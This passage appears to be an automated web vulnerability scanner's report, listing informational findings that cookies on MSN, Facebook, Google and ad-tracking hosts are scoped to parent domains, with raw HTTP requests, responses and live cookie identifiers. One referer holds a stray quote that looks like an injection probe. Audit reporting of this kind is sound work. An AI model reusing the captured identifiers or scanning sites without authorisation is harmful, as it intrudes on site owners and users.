Set-Cookie: MC1=V=3&GUID=db3e8205e43d4e5eaa57a6d1324745b7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=ADBCA3C4A108460A871E079DD85C62EB; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:19 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 38689

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.104. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/everyday-style/staticslideshowglamour.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3f5abd0dc0f84cbe94df6230af2ee06c; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=25F4103F0B9D43649A7DDF5A83578845; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/everyday-style/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3f5abd0dc0f84cbe94df6230af2ee06c; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=25F4103F0B9D43649A7DDF5A83578845; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 47565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.105. http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/everyday-style/staticslideshowlucky.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=b92db3a9296f4d6dac31d28373f517a4; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=86119F07135943FAA639279C0A5E608F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/everyday-style/staticslideshowlucky.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b92db3a9296f4d6dac31d28373f517a4; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=86119F07135943FAA639279C0A5E608F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 53009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.106. http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/well-groomed-male/staticslideshowgq.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=82f20f62c0c34e9aa45db0562ae04303; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=792657CF36AE4135914E87FA814E0519; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:18 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/well-groomed-male/staticslideshowgq.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=82f20f62c0c34e9aa45db0562ae04303; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=792657CF36AE4135914E87FA814E0519; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:18 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 47396

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.107. http://local.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c3af7a7696394c059fb54ea07012ac32; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=1C752DD9CA8D47F6B859932998A5A5A5; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.108. http://local.msn.com/hourly.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/hourly.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a88927d5284b4f0db193dcb398666b00; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=DE601FFA41DC4AE7A2ACD605FC555949; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hourly.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.109. http://local.msn.com/movies-events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/movies-events.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c724f512793f40f7b545863d70887ae9; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=91907563A38849D1A4E116FF013302D8; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /movies-events.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.110. http://local.msn.com/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/news.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=f947a926dcc6448ab9adb2fe46c957ce; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=BA421F87D3D544989D735829E15D49E7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.111. http://local.msn.com/restaurants.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/restaurants.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=55093cd8c86c4eec9aa83f4a411553a7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D4302824917C48BF812A10E485459A9D; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:58 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /restaurants.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.112. http://local.msn.com/sports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/sports.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=91674b5e4f20471eb76593a1de875742; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=29EFBD9A51484401A707F30A0C1054D7; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sports.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.113. http://local.msn.com/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/ten-day.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=a493fc2dada348559f36f3b1b7ee2baa; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A97D30A3A7E74A1390F36B78341CB76F; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ten-day.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.114. http://local.msn.com/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.msn.com
Path:	/weather.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=f0bf2ff54ef24146a8f224ade917b784; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=AD37BD0DAAF74A8193957788A235401B; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /weather.aspx HTTP/1.1
Host: local.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.115. https://login.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.116. https://login.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.117. https://login.facebook.com/help/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/help/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Fhelp%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.118. https://login.facebook.com/login.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
datr=8CJHTYhjyotVYfKpZ5B35lnF; expires=Fri, 01-Feb-2013 16:27:20 GMT; path=/; domain=.facebook.com; httponly
reg_fb_ref=https%3A%2F%2Flogin.facebook.com%2Flogin.php%3Flogin_attempt%3D1; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.119. https://login.facebook.com/r.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.facebook.com
Path:	/r.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

__utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
__utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.120. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=3c1c6ba55d5a5743:TM=1296574544:LM=1296574544:S=DhLUtFxFrNdY16c3; expires=Thu, 31-Jan-2013 15:35:44 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.121. http://media.fastclick.net/w/tre previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.fastclick.net
Path:	/w/tre

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

lyc=AwAAAATSI0dNACAAAd1YIASgAAYDSAAApr1EYBcBlVqgFCAAAWxLIASgAAFEXqAIIAADgVEAAA==; domain=.fastclick.net; path=/; expires=Fri, 01-Feb-2013 15:43:38 GMT
pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Fri, 01-Feb-2013 15:43:38 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=24132;evt=16926;cat1=20864;cat2=20865;rand=[CACHEBUSTER] HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://offers.lendingtree.com/splitter/splitter.ashx?id=msnhptext12111&promo=00313&source=4666360&esourceid=4666360&800Num=1-800-289-1731'&adtype=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; vt=10070:256698:477674:54816:0:1295925050:3|11008:274624:511498:54393:0:1296265712:0|; adv_ic=ByAAAABBd0NNIAYGAAFJAAC2USAHIAtAAAHwceABFwH6XeABFwE+cqAXBEMAAPxI4AEXAGTgAi8Bq17gARfgAy8AaOACFwBh4AIvAZlQ4AEvAD3gAl8AsOACLwBY4AIv4ANH4AMvAeFZ4AFHAFbgAi8A5CDbwNfgAy8BAlvgARcAUOACLwSLXAAABEEEIAACHrNAgR8g7wCpIO8AYCATQAAATeACLwDVIC8AAkAUIAACvQ0/4AAvABsgjwB2IBNAAABL4AIvAdtX4AF3AErgAhcAGuACpwBB4AIXAD/hAgcAIOACFwB54AK/AB3gAhcAxeACLwAY4AIX4QNP4AMXAWU44AGPAVzVoO8giwBk4AIXAIvA1yAXBM1PAAADQNQgAABV4AIXAUdT4AFHACbgAhcAD+ACjwAD4AIXABjgAhcB/gyhNyBfAbda4AFHANzgAhcAxuACFwDY4AIXACjgAkcAxOACFwAV4AIXAKvgAhcBeUfAXwEAAA==; lyc=AgAAAASmvURNACAAAZVaIASgAAFsS6AIIAAB3VggBKAAAwNIAAA=; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:43:38 GMT
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: image/gif
Content-Length: 43
Set-Cookie: lyc=AwAAAATSI0dNACAAAd1YIASgAAYDSAAApr1EYBcBlVqgFCAAAWxLIASgAAFEXqAIIAADgVEAAA==; domain=.fastclick.net; path=/; expires=Fri, 01-Feb-2013 15:43:38 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Fri, 01-Feb-2013 15:43:38 GMT

GIF89a.............!.......,...........D..;

11.122. http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://millenniumhotels.122.2o7.net
Path:	/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s_vi_x7Ezx7Fx7Fvx7Dx7Dzfx7Ex7Bx7Cgvx7Fx60gx60g=[CS]v4|0-0|4D48285A[CE]; Expires=Sun, 31 Jan 2016 15:35:54 GMT; Domain=.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/millenniumhotelstst/1/H.22.1/s34298913453239 HTTP/1.1
Host: millenniumhotels.122.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26A41302851D26C6-4000010BE0598ACB[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Tue, 01 Feb 2011 15:35:54 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Ezx7Fx7Fvx7Dx7Dzfx7Ex7Bx7Cgvx7Fx60gx60g=[CS]v4|0-0|4D48285A[CE]; Expires=Sun, 31 Jan 2016 15:35:54 GMT; Domain=.2o7.net; Path=/
Location: http://millenniumhotels.122.2o7.net/b/ss/millenniumhotelstst/1/H.22.1/s34298913453239?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Mon, 31 Jan 2011 15:35:54 GMT
Last-Modified: Wed, 02 Feb 2011 15:35:54 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www44
Content-Length: 0
Content-Type: text/plain
Connection: close

11.123. http://movies.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ac2682d41e5a4a9e995a518357a307fd; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.124. http://movies.msn.com/movies/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/movies/article.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=2517094174fb432cac61ae4a83e4cba2; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /movies/article.aspx?news=625907 HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.125. http://movies.msn.com/new-on-dvd/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/new-on-dvd/movies/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=3846db8e912c4c41babf7bbf1d72ec94; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new-on-dvd/movies/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.126. http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=c64fe33f4baf49b3bc5808d8f4db0984; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/5-demonic-possession-movies/story/across-the-universe/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.127. http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=bf272adeee6c4734bab84b966f463dd6; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/henry-cavill-is-superman/story/across-the-universe/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.128. http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/in-praise-of-buried/story/across-the-universe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=e597dff1d43e4f20abc3e13f769d3925; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/in-praise-of-buried/story/across-the-universe/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.129. http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=ad9eb7cabd0844bdab83df2bf8a2e6fd; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/ HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.130. http://movies.msn.com/showtimes/showtimes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://movies.msn.com
Path:	/showtimes/showtimes.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=77c136239add4ff1b69507318edbbcf5; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showtimes/showtimes.aspx HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 135
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /showtimes/?
